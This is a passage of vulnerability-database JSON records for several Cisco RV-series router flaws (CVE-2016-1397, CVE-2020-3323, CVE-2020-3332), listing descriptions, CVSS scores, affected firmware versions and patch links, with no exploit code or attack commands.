"author": "CNVD",
"id": "CNVD-2016-04094",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201606-366",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-90216",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04094"
},
{
"db": "VULHUB",
"id": "VHN-90216"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003299"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-366"
},
{
"db": "NVD",
"id": "CVE-2016-1397"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow in the web-based management interface on Cisco RV110W devices with firmware before 1.2.1.7, RV130W devices with firmware before 1.0.3.16, and RV215W devices with firmware before 1.3.0.8 allows remote authenticated users to cause a denial of service (device reload) via crafted configuration commands in an HTTP request, aka Bug ID CSCux82523. The Cisco RV130WWireless-N is a versatile VPN router; the Cisco RV110W/RV215W is a router that combines wired/wireless network connectivity, VPN, and firewall. Multiple Cisco Products are prone to a denial-of-service vulnerability. \nAttackers can exploit this issue to reload the affected device, denying service to legitimate users. \nThis issue is being tracked by Cisco bug IDs CSCux82523, CSCux82531 and CSCux82536",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-1397"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003299"
},
{
"db": "CNVD",
"id": "CNVD-2016-04094"
},
{
"db": "BID",
"id": "91216"
},
{
"db": "VULHUB",
"id": "VHN-90216"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-1397",
"trust": 3.4
},
{
"db": "SECTRACK",
"id": "1036115",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003299",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201606-366",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2016-04094",
"trust": 0.6
},
{
"db": "BID",
"id": "91216",
"trust": 0.3
},
{
"db": "VULHUB",
"id": "VHN-90216",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04094"
},
{
"db": "VULHUB",
"id": "VHN-90216"
},
{
"db": "BID",
"id": "91216"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003299"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-366"
},
{
"db": "NVD",
"id": "CVE-2016-1397"
}
]
},
"id": "VAR-201606-0433",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04094"
},
{
"db": "VULHUB",
"id": "VHN-90216"
}
],
"trust": 1.233139435
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04094"
}
]
},
"last_update_date": "2024-11-23T22:27:01.475000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-20160615-rv2",
"trust": 0.8,
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160615-rv2"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003299"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90216"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003299"
},
{
"db": "NVD",
"id": "CVE-2016-1397"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160615-rv2"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1036115"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1397"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1397"
},
{
"trust": 0.6,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160615-rv2/"
},
{
"trust": 0.3,
"url": "http://www.cisco.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04094"
},
{
"db": "VULHUB",
"id": "VHN-90216"
},
{
"db": "BID",
"id": "91216"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003299"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-366"
},
{
"db": "NVD",
"id": "CVE-2016-1397"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2016-04094"
},
{
"db": "VULHUB",
"id": "VHN-90216"
},
{
"db": "BID",
"id": "91216"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003299"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-366"
},
{
"db": "NVD",
"id": "CVE-2016-1397"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-06-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-04094"
},
{
"date": "2016-06-19T00:00:00",
"db": "VULHUB",
"id": "VHN-90216"
},
{
"date": "2016-06-15T00:00:00",
"db": "BID",
"id": "91216"
},
{
"date": "2016-06-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-003299"
},
{
"date": "2016-06-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201606-366"
},
{
"date": "2016-06-19T01:59:05.107000",
"db": "NVD",
"id": "CVE-2016-1397"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-06-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-04094"
},
{
"date": "2017-09-01T00:00:00",
"db": "VULHUB",
"id": "VHN-90216"
},
{
"date": "2016-07-06T15:00:00",
"db": "BID",
"id": "91216"
},
{
"date": "2016-06-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-003299"
},
{
"date": "2016-06-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201606-366"
},
{
"date": "2024-11-21T02:46:22.020000",
"db": "NVD",
"id": "CVE-2016-1397"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201606-366"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco Device product firmware Web -Based management interface buffer overflow vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003299"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201606-366"
}
],
"trust": 0.6
}
}
var-202007-1020
Vulnerability from variot
A vulnerability in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system of the affected device. plural Cisco Small Business RV A buffer error vulnerability exists in series routers.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202007-1020",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv110w wireless-n vpn firewall",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.2.8"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "1.3.1.7"
},
{
"model": "rv130 vpn router",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.3.54"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.3.54"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn routerr",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv130 vpn router",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008406"
},
{
"db": "NVD",
"id": "CVE-2020-3323"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv130_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008406"
}
]
},
"cve": "CVE-2020-3323",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2020-3323",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2020-008406",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2020-3323",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "ykramarz@cisco.com",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2020-3323",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-008406",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-3323",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "ykramarz@cisco.com",
"id": "CVE-2020-3323",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "JVNDB-2020-008406",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-202007-1149",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008406"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1149"
},
{
"db": "NVD",
"id": "CVE-2020-3323"
},
{
"db": "NVD",
"id": "CVE-2020-3323"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system of the affected device. plural Cisco Small Business RV A buffer error vulnerability exists in series routers.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-3323"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008406"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-3323",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2020-008406",
"trust": 0.8
},
{
"db": "AUSCERT",
"id": "ESB-2020.2417",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1149",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008406"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1149"
},
{
"db": "NVD",
"id": "CVE-2020-3323"
}
]
},
"id": "VAR-202007-1020",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.533139435
},
"last_update_date": "2024-11-23T21:59:08.748000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-rv-rce-AQKREqp",
"trust": 0.8,
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-rce-AQKREqp"
},
{
"title": "Multiple Cisco Product Buffer Error Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=124599"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008406"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1149"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
},
{
"problemtype": "CWE-20",
"trust": 1.0
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008406"
},
{
"db": "NVD",
"id": "CVE-2020-3323"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-rce-aqkreqp"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-3323"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-3323"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2417/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008406"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1149"
},
{
"db": "NVD",
"id": "CVE-2020-3323"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008406"
},
{
"db": "CNNVD",
"id": "CNNVD-202007-1149"
},
{
"db": "NVD",
"id": "CVE-2020-3323"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-09-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-008406"
},
{
"date": "2020-07-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202007-1149"
},
{
"date": "2020-07-16T18:15:17.157000",
"db": "NVD",
"id": "CVE-2020-3323"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-09-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-008406"
},
{
"date": "2021-08-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202007-1149"
},
{
"date": "2024-11-21T05:30:48.520000",
"db": "NVD",
"id": "CVE-2020-3323"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202007-1149"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco Small Business RV Buffer error vulnerability in series routers",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008406"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202007-1149"
}
],
"trust": 0.6
}
}
var-202007-1023
Vulnerability from variot
A vulnerability in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Series Routers could allow an authenticated, remote attacker to inject arbitrary shell commands that are executed by an affected device. The vulnerability is due to insufficient input validation of user-supplied data. An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary shell commands or scripts with root privileges on the affected device
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202007-1023",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv110w wireless-n vpn firewall",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.2.8"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.3.55"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "1.3.1.7"
},
{
"model": "rv130 vpn router",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.3.55"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv130 vpn router",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008341"
},
{
"db": "NVD",
"id": "CVE-2020-3332"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:cisco:rv130w_wireless-n_multifunction_vpn_router_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv110w_wireless-n_vpn_firewall_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv130_vpn_router_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv215w_wireless-n_vpn_router_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-008341"
}
]
},
"cve": "CVE-2020-3332",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CVE-2020-3332",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2020-008341",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2020-3332",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
